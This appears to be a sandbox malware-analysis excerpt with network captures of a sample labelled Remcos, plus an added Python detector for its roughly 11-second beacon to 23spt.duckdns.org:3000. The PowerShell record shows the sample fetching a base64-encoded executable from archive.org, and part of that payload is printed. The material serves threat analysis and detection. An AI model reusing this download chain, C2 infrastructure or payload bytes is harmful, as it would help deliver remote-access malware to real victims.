                              Oct 2, 2024 05:29:49.918231964 CEST | 49706 | 443 | 192.168.2.11 | 188.114.96.3
                              Oct 2, 2024 05:29:50.405608892 CEST | 49707 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:29:50.410742044 CEST | 3000 | 49707 | 192.169.69.26 | 192.168.2.11
                              Oct 2, 2024 05:29:50.410815001 CEST | 49707 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:29:50.412161112 CEST | 49707 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:29:50.417051077 CEST | 3000 | 49707 | 192.169.69.26 | 192.168.2.11
                              Oct 2, 2024 05:30:00.239814043 CEST | 3000 | 49707 | 192.169.69.26 | 192.168.2.11
                              Oct 2, 2024 05:30:00.240072966 CEST | 49707 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:30:00.240072966 CEST | 49707 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:30:00.244921923 CEST | 3000 | 49707 | 192.169.69.26 | 192.168.2.11
                              Oct 2, 2024 05:30:01.249028921 CEST | 49714 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:30:01.254316092 CEST | 3000 | 49714 | 192.169.69.26 | 192.168.2.11
                              Oct 2, 2024 05:30:01.254661083 CEST | 49714 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:30:01.255134106 CEST | 49714 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:30:01.259946108 CEST | 3000 | 49714 | 192.169.69.26 | 192.168.2.11
                              Oct 2, 2024 05:30:10.993820906 CEST | 3000 | 49714 | 192.169.69.26 | 192.168.2.11
                              Oct 2, 2024 05:30:10.994025946 CEST | 49714 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:30:10.994071960 CEST | 49714 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:30:10.999653101 CEST | 3000 | 49714 | 192.169.69.26 | 192.168.2.11
                              Oct 2, 2024 05:30:11.999350071 CEST | 49715 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:30:12.004257917 CEST | 3000 | 49715 | 192.169.69.26 | 192.168.2.11
                              Oct 2, 2024 05:30:12.004359961 CEST | 49715 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:30:12.004709005 CEST | 49715 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:30:12.009608030 CEST | 3000 | 49715 | 192.169.69.26 | 192.168.2.11
                              Oct 2, 2024 05:30:21.751375914 CEST | 3000 | 49715 | 192.169.69.26 | 192.168.2.11
                              Oct 2, 2024 05:30:21.751456022 CEST | 49715 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:30:21.751488924 CEST | 49715 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:30:21.757030964 CEST | 3000 | 49715 | 192.169.69.26 | 192.168.2.11
                              Oct 2, 2024 05:30:22.764642000 CEST | 49716 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:30:22.769695997 CEST | 3000 | 49716 | 192.169.69.26 | 192.168.2.11
                              Oct 2, 2024 05:30:22.769844055 CEST | 49716 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:30:22.770163059 CEST | 49716 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:30:22.774929047 CEST | 3000 | 49716 | 192.169.69.26 | 192.168.2.11
                              Oct 2, 2024 05:30:32.899014950 CEST | 3000 | 49716 | 192.169.69.26 | 192.168.2.11
                              Oct 2, 2024 05:30:32.899035931 CEST | 3000 | 49716 | 192.169.69.26 | 192.168.2.11
                              Oct 2, 2024 05:30:32.899120092 CEST | 49716 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:30:32.908989906 CEST | 49716 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:30:32.913841009 CEST | 3000 | 49716 | 192.169.69.26 | 192.168.2.11
                              Oct 2, 2024 05:30:33.920877934 CEST | 49717 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:30:33.925895929 CEST | 3000 | 49717 | 192.169.69.26 | 192.168.2.11
                              Oct 2, 2024 05:30:33.925997019 CEST | 49717 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:30:33.926373959 CEST | 49717 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:30:33.931159973 CEST | 3000 | 49717 | 192.169.69.26 | 192.168.2.11
                              Oct 2, 2024 05:30:43.679620028 CEST | 3000 | 49717 | 192.169.69.26 | 192.168.2.11
                              Oct 2, 2024 05:30:43.679877043 CEST | 49717 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:30:43.679877043 CEST | 49717 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:30:43.684725046 CEST | 3000 | 49717 | 192.169.69.26 | 192.168.2.11
                              Oct 2, 2024 05:30:44.687700033 CEST | 49719 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:30:44.693031073 CEST | 3000 | 49719 | 192.169.69.26 | 192.168.2.11
                              Oct 2, 2024 05:30:44.693212032 CEST | 49719 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:30:44.693708897 CEST | 49719 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:30:44.698487043 CEST | 3000 | 49719 | 192.169.69.26 | 192.168.2.11
                              Oct 2, 2024 05:30:54.459727049 CEST | 3000 | 49719 | 192.169.69.26 | 192.168.2.11
                              Oct 2, 2024 05:30:54.459870100 CEST | 49719 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:30:54.459955931 CEST | 49719 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:30:54.464817047 CEST | 3000 | 49719 | 192.169.69.26 | 192.168.2.11
                              Oct 2, 2024 05:30:55.880702019 CEST | 49720 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:30:55.885549068 CEST | 3000 | 49720 | 192.169.69.26 | 192.168.2.11
                              Oct 2, 2024 05:30:55.885684013 CEST | 49720 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:30:55.885920048 CEST | 49720 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:30:55.890825987 CEST | 3000 | 49720 | 192.169.69.26 | 192.168.2.11
                              Oct 2, 2024 05:31:05.708508968 CEST | 3000 | 49720 | 192.169.69.26 | 192.168.2.11
                              Oct 2, 2024 05:31:05.708581924 CEST | 49720 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:31:05.708688974 CEST | 49720 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:31:05.713630915 CEST | 3000 | 49720 | 192.169.69.26 | 192.168.2.11
                              Oct 2, 2024 05:31:06.717865944 CEST | 49721 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:31:06.762141943 CEST | 3000 | 49721 | 192.169.69.26 | 192.168.2.11
                              Oct 2, 2024 05:31:06.762939930 CEST | 49721 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:31:06.763293028 CEST | 49721 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:31:06.768033028 CEST | 3000 | 49721 | 192.169.69.26 | 192.168.2.11
                              Oct 2, 2024 05:31:16.550450087 CEST | 3000 | 49721 | 192.169.69.26 | 192.168.2.11
                              Oct 2, 2024 05:31:16.550926924 CEST | 49721 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:31:16.551019907 CEST | 49721 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:31:16.555738926 CEST | 3000 | 49721 | 192.169.69.26 | 192.168.2.11
                              Oct 2, 2024 05:31:17.561785936 CEST | 49722 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:31:17.567003965 CEST | 3000 | 49722 | 192.169.69.26 | 192.168.2.11
                              Oct 2, 2024 05:31:17.567086935 CEST | 49722 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:31:17.567430973 CEST | 49722 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:31:17.572338104 CEST | 3000 | 49722 | 192.169.69.26 | 192.168.2.11
                              Oct 2, 2024 05:31:27.385427952 CEST | 3000 | 49722 | 192.169.69.26 | 192.168.2.11
                              Oct 2, 2024 05:31:27.385605097 CEST | 49722 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:31:27.385700941 CEST | 49722 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:31:27.569611073 CEST | 3000 | 49722 | 192.169.69.26 | 192.168.2.11
                              Oct 2, 2024 05:31:27.569669962 CEST | 3000 | 49722 | 192.169.69.26 | 192.168.2.11
                              Oct 2, 2024 05:31:27.569677114 CEST | 49722 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:31:28.389913082 CEST | 49723 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:31:28.521219969 CEST | 3000 | 49723 | 192.169.69.26 | 192.168.2.11
                              Oct 2, 2024 05:31:28.523082972 CEST | 49723 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:31:28.523262978 CEST | 49723 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:31:28.528033972 CEST | 3000 | 49723 | 192.169.69.26 | 192.168.2.11
                              Oct 2, 2024 05:31:38.284257889 CEST | 3000 | 49723 | 192.169.69.26 | 192.168.2.11
                              Oct 2, 2024 05:31:38.284353971 CEST | 49723 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:31:38.284471989 CEST | 49723 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:31:38.289243937 CEST | 3000 | 49723 | 192.169.69.26 | 192.168.2.11
                              Oct 2, 2024 05:31:39.295861959 CEST | 49724 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:31:39.300982952 CEST | 3000 | 49724 | 192.169.69.26 | 192.168.2.11
                              Oct 2, 2024 05:31:39.301141977 CEST | 49724 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:31:39.301505089 CEST | 49724 | 3000 | 192.168.2.11 | 192.169.69.26
                              Oct 2, 2024 05:31:39.306344032 CEST | 3000 | 49724 | 192.169.69.26 | 192.168.2.11
                              Oct 2, 2024 05:31:49.157362938 CEST | 3000 | 49724 | 192.169.69.26 | 192.168.2.11
                              Oct 2, 2024 05:31:49.157586098 CEST | 49724 | 3000 | 192.168.2.11 | 192.169.69.26
                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                              Oct 2, 2024 05:29:41.658802032 CEST | 63891 | 53 | 192.168.2.11 | 1.1.1.1
                              Oct 2, 2024 05:29:41.807509899 CEST | 53 | 63891 | 1.1.1.1 | 192.168.2.11
                              Oct 2, 2024 05:29:48.429210901 CEST | 55117 | 53 | 192.168.2.11 | 1.1.1.1
                              Oct 2, 2024 05:29:48.436530113 CEST | 53 | 55117 | 1.1.1.1 | 192.168.2.11
                              Oct 2, 2024 05:29:50.296443939 CEST | 59287 | 53 | 192.168.2.11 | 1.1.1.1
                              Oct 2, 2024 05:29:50.401395082 CEST | 53 | 59287 | 1.1.1.1 | 192.168.2.11
                              Oct 2, 2024 05:30:55.468090057 CEST | 55815 | 53 | 192.168.2.11 | 1.1.1.1
                              Oct 2, 2024 05:30:55.879667997 CEST | 53 | 55815 | 1.1.1.1 | 192.168.2.11
                              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                              Oct 2, 2024 05:29:41.658802032 CEST | 192.168.2.11 | 1.1.1.1 | 0xc9cb | Standard query (0) | ia600100.us.archive.org | A (IP address) | IN (0x0001) | false
                              Oct 2, 2024 05:29:48.429210901 CEST | 192.168.2.11 | 1.1.1.1 | 0xf9a9 | Standard query (0) | paste.ee | A (IP address) | IN (0x0001) | false
                              Oct 2, 2024 05:29:50.296443939 CEST | 192.168.2.11 | 1.1.1.1 | 0xb041 | Standard query (0) | 23spt.duckdns.org | A (IP address) | IN (0x0001) | false
                              Oct 2, 2024 05:30:55.468090057 CEST | 192.168.2.11 | 1.1.1.1 | 0x40e1 | Standard query (0) | 23spt.duckdns.org | A (IP address) | IN (0x0001) | false
                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                              Oct 2, 2024 05:29:41.807509899 CEST | 1.1.1.1 | 192.168.2.11 | 0xc9cb | No error (0) | ia600100.us.archive.org | | 207.241.227.240 | A (IP address) | IN (0x0001) | false
                              Oct 2, 2024 05:29:48.436530113 CEST | 1.1.1.1 | 192.168.2.11 | 0xf9a9 | No error (0) | paste.ee | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                              Oct 2, 2024 05:29:48.436530113 CEST | 1.1.1.1 | 192.168.2.11 | 0xf9a9 | No error (0) | paste.ee | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                              Oct 2, 2024 05:29:50.401395082 CEST | 1.1.1.1 | 192.168.2.11 | 0xb041 | No error (0) | 23spt.duckdns.org | | 192.169.69.26 | A (IP address) | IN (0x0001) | false
                              Oct 2, 2024 05:30:55.879667997 CEST | 1.1.1.1 | 192.168.2.11 | 0x40e1 | No error (0) | 23spt.duckdns.org | | 192.169.69.26 | A (IP address) | IN (0x0001) | false
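The TCP rows above show the sample opening a fresh connection (a new client source port each time: 49707, 49714, 49715, ...) to 192.169.69.26:3000 roughly every 11 seconds, and the DNS answers tie that address to 23spt.duckdns.org, a free dynamic-DNS name. That fixed cadence is the Remcos check-in loop and is what a beaconing detector keys on. The following is an added example, not part of the Joe Sandbox report: it parses packet rows in the delimited form used above, takes the earliest outbound packet per client source port as a connection start, and flags destinations whose reconnect gaps have very low jitter. The embedded rows are copied from the capture above, reduced to the first 192.169.69.26:3000 session in full plus the opening packet of each later one; LOCAL_NET, the DNS label map (taken from the answers above) and the thresholds are this example's own assumptions.

```python
"""Beacon-interval check over the TCP packet rows and DNS answers of the report above.

Added example, not part of the Joe Sandbox report. PACKET_ROWS is a subset of the
capture above in 'timestamp | src port | dst port | src IP | dst IP' form; LOCAL_NET,
DNS_ANSWERS and the thresholds are assumptions made for this example.
"""
import re
import statistics
from collections import defaultdict
from datetime import datetime, timezone

LOCAL_NET = "192.168.2."  # the analysis VM's network in this report (assumption)

# First session to 192.169.69.26:3000 in full, then the opening packet of each later one.
PACKET_ROWS = """\
Oct 2, 2024 05:29:50.405608892 CEST | 49707 | 3000 | 192.168.2.11 | 192.169.69.26
Oct 2, 2024 05:29:50.410742044 CEST | 3000 | 49707 | 192.169.69.26 | 192.168.2.11
Oct 2, 2024 05:29:50.410815001 CEST | 49707 | 3000 | 192.168.2.11 | 192.169.69.26
Oct 2, 2024 05:29:50.412161112 CEST | 49707 | 3000 | 192.168.2.11 | 192.169.69.26
Oct 2, 2024 05:29:50.417051077 CEST | 3000 | 49707 | 192.169.69.26 | 192.168.2.11
Oct 2, 2024 05:30:00.239814043 CEST | 3000 | 49707 | 192.169.69.26 | 192.168.2.11
Oct 2, 2024 05:30:00.240072966 CEST | 49707 | 3000 | 192.168.2.11 | 192.169.69.26
Oct 2, 2024 05:30:00.240072966 CEST | 49707 | 3000 | 192.168.2.11 | 192.169.69.26
Oct 2, 2024 05:30:00.244921923 CEST | 3000 | 49707 | 192.169.69.26 | 192.168.2.11
Oct 2, 2024 05:30:01.249028921 CEST | 49714 | 3000 | 192.168.2.11 | 192.169.69.26
Oct 2, 2024 05:30:11.999350071 CEST | 49715 | 3000 | 192.168.2.11 | 192.169.69.26
Oct 2, 2024 05:30:22.764642000 CEST | 49716 | 3000 | 192.168.2.11 | 192.169.69.26
Oct 2, 2024 05:30:33.920877934 CEST | 49717 | 3000 | 192.168.2.11 | 192.169.69.26
Oct 2, 2024 05:30:44.687700033 CEST | 49719 | 3000 | 192.168.2.11 | 192.169.69.26
Oct 2, 2024 05:30:55.880702019 CEST | 49720 | 3000 | 192.168.2.11 | 192.169.69.26
Oct 2, 2024 05:31:06.717865944 CEST | 49721 | 3000 | 192.168.2.11 | 192.169.69.26
Oct 2, 2024 05:31:17.561785936 CEST | 49722 | 3000 | 192.168.2.11 | 192.169.69.26
Oct 2, 2024 05:31:28.389913082 CEST | 49723 | 3000 | 192.168.2.11 | 192.169.69.26
Oct 2, 2024 05:31:39.295861959 CEST | 49724 | 3000 | 192.168.2.11 | 192.169.69.26
"""

# Resolved names from the DNS answers above. A free dynamic-DNS provider is a weak
# signal on its own but a strong one next to a regular beacon.
DNS_ANSWERS = {
    "192.169.69.26": "23spt.duckdns.org",
    "188.114.96.3": "paste.ee",
    "207.241.227.240": "ia600100.us.archive.org",
}
DYNDNS_SUFFIXES = ("duckdns.org",)  # extend with other free dynamic-DNS providers

TS_RE = re.compile(r"(\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(\d{1,9}) \w+")


def parse_ts(text):
    """'Oct 2, 2024 05:29:50.405608892 CEST' -> float seconds, nanosecond digits kept.

    strptime's %f only accepts six digits, so the fraction is added by hand. The zone
    label is ignored: only differences between rows of one capture are needed."""
    m = TS_RE.fullmatch(text.strip())
    if m is None:
        raise ValueError(f"unrecognised timestamp: {text!r}")
    base = datetime.strptime(m.group(1), "%b %d, %Y %H:%M:%S").replace(tzinfo=timezone.utc)
    return base.timestamp() + int(m.group(2).ljust(9, "0")) / 1e9


def connection_starts(rows):
    """Map (dst IP, dst port) -> sorted start times of outbound connections.

    A connection start is the earliest packet the client sent from a given source
    port, so the ACKs, pushes and FINs of the same session are not counted again."""
    earliest = {}
    for line in rows.strip().splitlines():
        ts, sport, dport, sip, dip = (f.strip() for f in line.split("|"))
        if not sip.startswith(LOCAL_NET) or dip.startswith(LOCAL_NET):
            continue  # keep client -> outside packets only
        key = (dip, int(dport), int(sport))
        t = parse_ts(ts)
        if key not in earliest or t < earliest[key]:
            earliest[key] = t
    by_dst = defaultdict(list)
    for (dip, dport, _sport), t in earliest.items():
        by_dst[(dip, dport)].append(t)
    return {k: sorted(v) for k, v in by_dst.items()}


def find_beacons(rows, min_connections=5, max_cv=0.2):
    """Flag destinations that are reconnected to at a regular cadence.

    Regularity is the coefficient of variation (stdev / mean) of the gaps between
    connection starts: a fixed sleep loop scores near zero, human traffic much higher."""
    findings = []
    for (dip, dport), starts in connection_starts(rows).items():
        if len(starts) < max(min_connections, 3):
            continue
        gaps = [b - a for a, b in zip(starts, starts[1:])]
        cv = statistics.pstdev(gaps) / statistics.mean(gaps)
        if cv > max_cv:
            continue
        name = DNS_ANSWERS.get(dip, "")
        findings.append({
            "dst": f"{dip}:{dport}",
            "name": name,
            "dyndns": name.endswith(DYNDNS_SUFFIXES),
            "connections": len(starts),
            "median_gap_s": statistics.median(gaps),
            "cv": cv,
        })
    return findings


if __name__ == "__main__":
    for f in find_beacons(PACKET_ROWS):
        print(f"{f['dst']} ({f['name'] or 'unresolved'}): {f['connections']} connections, "
              f"median gap {f['median_gap_s']:.2f}s, cv {f['cv']:.3f}, dyndns={f['dyndns']}")
```

On the rows above this reports one beacon: 192.169.69.26:3000 (23spt.duckdns.org), 11 connections with a median gap of about 10.8 s and a coefficient of variation near 0.01. The one-session-per-port grouping matters: counting every client packet would turn each 9-packet session into several "connections" and flatten the interval signal. Note that the paste.ee transfer on port 443 is a single connection and is correctly not flagged; it is the payload fetch, not the beacon.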
                              • ia600100.us.archive.org
                              • paste.ee
                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              0 | 192.168.2.11 | 49705 | 207.241.227.240 | 443 | 7540 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              Timestamp | Bytes transferred | Direction | Data
                              2024-10-02 03:29:42 UTC | 109 | OUT | GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1
                              Host: ia600100.us.archive.org
                              Connection: Keep-Alive
                              2024-10-02 03:29:42 UTC | 606 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.24.0 (Ubuntu)
                              Date: Wed, 02 Oct 2024 03:29:42 GMT
                              Content-Type: text/plain; charset=utf-8
                              Content-Length: 2823512
                              Last-Modified: Wed, 11 Sep 2024 23:50:18 GMT
                              Connection: close
                              ETag: "66e22cba-2b1558"
                              Strict-Transport-Security: max-age=15724800
                              Expires: Wed, 02 Oct 2024 09:29:42 GMT
                              Cache-Control: max-age=21600
                              Access-Control-Allow-Origin: *
                              Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                              Access-Control-Allow-Credentials: true
                              Accept-Ranges: bytes
                              2024-10-02 03:29:42 UTC15778INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 42 6f 43 42 62 6f 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 45 59 67 41 41 41 49 41 41 41 41 41 41 41 41 76 6d 55 67 41 41 41 67 41 41 41 41 67 43 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                              Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDABoCBboAAAAAAAAAAOAADiELATAAAEYgAAAIAAAAAAAAvmUgAAAgAAAAgCAAAABAAAAgAAAAAgA
                              2024-10-02 03:29:42 UTC16384INData Raw: 41 41 41 50 34 4d 45 77 42 46 41 67 41 41 41 41 55 41 41 41 41 31 41 41 41 41 4f 41 41 41 41 41 41 41 45 51 4d 52 46 78 45 49 63 35 73 46 41 41 5a 76 63 51 41 41 43 69 41 42 41 41 41 41 66 73 55 49 41 41 52 37 42 51 6b 41 42 44 6e 4a 2f 2f 2f 2f 4a 69 41 41 41 41 41 41 4f 4c 37 2f 2f 2f 38 41 41 4e 30 66 41 41 41 41 49 41 49 41 41 41 42 2b 78 51 67 41 42 48 73 53 43 51 41 45 4f 73 6e 36 2f 2f 38 6d 49 41 41 41 41 41 41 34 76 76 72 2f 2f 78 45 44 62 79 73 41 41 41 6f 57 50 6f 38 41 41 41 41 67 41 51 41 41 41 48 37 46 43 41 41 45 65 77 73 4a 41 41 51 36 6e 66 72 2f 2f 79 59 67 41 51 41 41 41 44 69 53 2b 76 2f 2f 45 67 63 6f 63 41 41 41 43 68 4d 49 49 41 55 41 41 41 42 2b 78 51 67 41 42 48 76 30 43 41 41 45 4f 6e 58 36 2f 2f 38 6d 49 41 59 41 41 41 41 34 61
                              Data Ascii: AAAP4MEwBFAgAAAAUAAAA1AAAAOAAAAAAAEQMRFxEIc5sFAAZvcQAACiABAAAAfsUIAAR7BQkABDnJ////JiAAAAAAOL7///8AAN0fAAAAIAIAAAB+xQgABHsSCQAEOsn6//8mIAAAAAA4vvr//xEDbysAAAoWPo8AAAAgAQAAAH7FCAAEewsJAAQ6nfr//yYgAQAAADiS+v//EgcocAAAChMIIAUAAAB+xQgABHv0CAAEOnX6//8mIAYAAAA4a
                              2024-10-02 03:29:42 UTC16384INData Raw: 2f 2f 2f 77 41 52 42 47 39 49 49 77 41 47 62 33 51 41 41 41 6f 54 42 53 41 46 41 41 41 41 4f 44 48 2f 2f 2f 38 41 4f 4e 73 41 41 41 41 67 43 41 41 41 41 44 67 45 41 41 41 41 2f 67 77 4d 41 45 55 67 41 41 41 41 4f 51 49 41 41 47 34 43 41 41 42 61 41 51 41 41 66 51 41 41 41 4d 73 43 41 41 43 4d 41 51 41 41 46 41 45 41 41 4a 77 44 41 41 43 55 41 41 41 41 41 51 4d 41 41 4c 77 41 41 41 41 57 41 41 41 41 33 41 49 41 41 4d 63 42 41 41 43 6a 41 51 41 41 53 67 49 41 41 41 55 41 41 41 43 62 41 67 41 41 58 67 41 41 41 49 45 42 41 41 41 38 41 51 41 41 61 77 45 41 41 42 30 44 41 41 44 38 41 41 41 41 66 77 49 41 41 4f 30 42 41 41 44 68 41 41 41 41 53 77 45 41 41 44 51 41 41 41 42 46 41 41 41 41 49 51 41 41 41 42 4d 43 41 41 41 34 4e 41 49 41 41 42 45 49 4f 6a 30 44 41
                              Data Ascii: ///wARBG9IIwAGb3QAAAoTBSAFAAAAODH///8AONsAAAAgCAAAADgEAAAA/gwMAEUgAAAAOQIAAG4CAABaAQAAfQAAAMsCAACMAQAAFAEAAJwDAACUAAAAAQMAALwAAAAWAAAA3AIAAMcBAACjAQAASgIAAAUAAACbAgAAXgAAAIEBAAA8AQAAawEAAB0DAAD8AAAAfwIAAO0BAADhAAAASwEAADQAAABFAAAAIQAAABMCAAA4NAIAABEIOj0DA
                              2024-10-02 03:29:42 UTC16384INData Raw: 38 52 43 53 68 31 41 67 41 47 62 7a 49 6a 41 41 59 52 43 57 2f 47 49 67 41 47 4b 48 59 43 41 41 5a 76 4d 69 4d 41 42 69 68 30 41 67 41 47 45 77 38 67 43 51 41 41 41 48 37 46 43 41 41 45 65 38 49 49 41 41 51 36 7a 50 37 2f 2f 79 59 67 44 51 41 41 41 44 6a 42 2f 76 2f 2f 45 51 49 54 41 79 41 49 41 41 41 41 2f 67 34 4b 41 44 69 72 2f 76 2f 2f 4f 42 73 42 41 41 41 67 41 41 41 41 41 48 37 46 43 41 41 45 65 37 4d 49 41 41 51 36 6c 76 37 2f 2f 79 59 67 41 41 41 41 41 44 69 4c 2f 76 2f 2f 45 51 45 67 70 30 47 63 33 79 41 44 41 41 41 41 59 79 42 63 44 35 4f 49 59 58 37 46 43 41 41 45 65 38 51 49 41 41 52 68 4b 46 51 43 41 41 59 6f 59 77 49 41 42 68 4d 43 49 42 34 41 41 41 41 34 56 2f 37 2f 2f 78 45 48 4f 6c 6f 42 41 41 41 67 43 67 41 41 41 48 37 46 43 41 41 45 65
                              Data Ascii: 8RCSh1AgAGbzIjAAYRCW/GIgAGKHYCAAZvMiMABih0AgAGEw8gCQAAAH7FCAAEe8IIAAQ6zP7//yYgDQAAADjB/v//EQITAyAIAAAA/g4KADir/v//OBsBAAAgAAAAAH7FCAAEe7MIAAQ6lv7//yYgAAAAADiL/v//EQEgp0Gc3yADAAAAYyBcD5OIYX7FCAAEe8QIAARhKFQCAAYoYwIABhMCIB4AAAA4V/7//xEHOloBAAAgCgAAAH7FCAAEe
                              2024-10-02 03:29:42 UTC16384INData Raw: 41 41 4f 4d 37 38 2f 2f 38 52 41 54 6b 71 2f 66 2f 2f 49 41 63 41 41 41 42 2b 78 51 67 41 42 48 76 6b 43 41 41 45 4f 72 50 38 2f 2f 38 6d 49 41 49 41 41 41 41 34 71 50 7a 2f 2f 77 41 41 41 52 41 41 41 41 49 41 71 77 44 35 70 41 46 33 41 41 41 41 41 43 5a 2b 6f 51 41 41 42 42 54 2b 41 53 6f 41 41 42 70 2b 6f 51 41 41 42 43 6f 41 4b 76 34 4a 41 41 42 76 5a 51 41 41 43 69 6f 41 4b 76 34 4a 41 41 42 76 54 51 41 41 43 69 6f 41 4c 67 44 2b 43 51 41 41 4b 50 77 6c 41 41 59 71 4c 67 44 2b 43 51 41 41 4b 4c 45 45 41 41 59 71 4b 76 34 4a 41 41 42 76 2b 51 49 41 42 69 6f 41 4b 76 34 4a 41 41 42 76 2b 41 49 41 42 69 6f 41 4b 76 34 4a 41 41 42 76 45 43 4d 41 42 69 6f 41 4c 67 44 2b 43 51 41 41 4b 43 55 42 41 41 6f 71 48 67 41 6f 73 41 51 41 42 69 70 4b 2f 67 6b 41 41
                              Data Ascii: AAOM78//8RATkq/f//IAcAAAB+xQgABHvkCAAEOrP8//8mIAIAAAA4qPz//wAAARAAAAIAqwD5pAF3AAAAACZ+oQAABBT+ASoAABp+oQAABCoAKv4JAABvZQAACioAKv4JAABvTQAACioALgD+CQAAKPwlAAYqLgD+CQAAKLEEAAYqKv4JAABv+QIABioAKv4JAABv+AIABioAKv4JAABvECMABioALgD+CQAAKCUBAAoqHgAosAQABipK/gkAA
